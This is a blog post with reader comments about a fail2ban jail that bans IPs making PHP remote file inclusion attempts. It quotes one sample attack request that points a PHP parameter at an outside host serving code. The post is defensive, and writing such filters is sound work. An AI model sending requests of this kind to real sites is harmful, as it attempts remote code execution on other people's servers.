Fail2ban filter for PHP Injection attacks

Aren’t you just tired of the massive amount of PHP Remote Injection attacks registered in your access log? You know, the ones that look like this:

GET /index.php?n=http://eatmyfood.hostinginfive.com/pizza.htm?

Even if you secure your webserver, and set allow_url_fopen = false in php.ini, the attack is still annoying.

Just make sure you save this file to your /etc/fail2ban/filter.d directory, then add this block to jail.conf and restart fail2ban:

[php-url-fopen]

enabled = true
port    = http,https
filter  = php-url-fopen
logpath = /var/www/*/logs/access_log
maxretry = 1

And done 🙂

Acerca de Buanzo

Io que se!
Esta entrada fue publicada en General. Guarda el enlace permanente.

6 respuestas a Fail2ban filter for PHP Injection attacks

  1. fasuto dijo:

    Creo que con tu expresion regular tambien baneas entradas legitimas donde aparezca .php?n=http://****
    en el REFERER.
    Por ejemplo, las entradas que vienen de google images o de banners:

    xxx.xxx.xxx.xxx – – [20/Jul/2009:06:13:02 +0200] «GET /xxx/index.html HTTP/1.1» 200 9398 «http://images.google.es/imgres?imgurl=http://www.xxxx.com/xy/imagenes/img.jpg&imgrefurl=http://www.xxxx.com/xy/index.htnl&usg=__pCH0q6sy06ssIsB4zJu_YYsqNZE=&h=163&w=227&sz=44&hl=es&start=2&um=1&tbnid=hjOK7M4WBtfFHM:&tbnh=78&tbnw=108&prev=/images%3Fq%3Dpunto%2Boro%26hl%3Des%26client%3Dfirefox-a%26rls%3Dorg.mozilla:es-ES:official%26sa%3DG%26um%3D1» «Mozilla/5.0 (Windows; U; Windows NT 6.0; es-ES; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)»

  2. Pingback: Ted Roche’s weblog » Adding Fail2Ban to the web site

  3. watt dijo:

    I’m on ubuntu 8.04 and don’t have any log files in var/www/ folder. What should I replace it with?

  4. sagichnich dijo:

    Nice feature, thank you. However, one need to activate the «action» part or fail2ban won’t start.

    Apache-logs on red hat based system lay at /var/log/httpd/access_log

    [php-url-fopen]

    enabled = true
    #port = http,https
    filter = php-url-fopen
    logpath = /var/log/httpd/access_log
    maxretry = 1
    action = iptables-multiport[name=PHP-fopen, port=»http,https», protocol=tcp]

  5. Bharath dijo:

    I love this feature, can some help me with the ignore regex for the following log entries

    xxx.xxx.xxx.xxx – – [10/Jun/2011:15:20:39 +0200] «GET /forums/cron.php?rand=1307712039 HTTP/1.1» 200 352 «http://domain.net/forums/externalredirect.php?url=http://foo.com» «Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1»

  6. Pingback: Xulen | Julián Fernández | blog

Los comentarios están cerrados.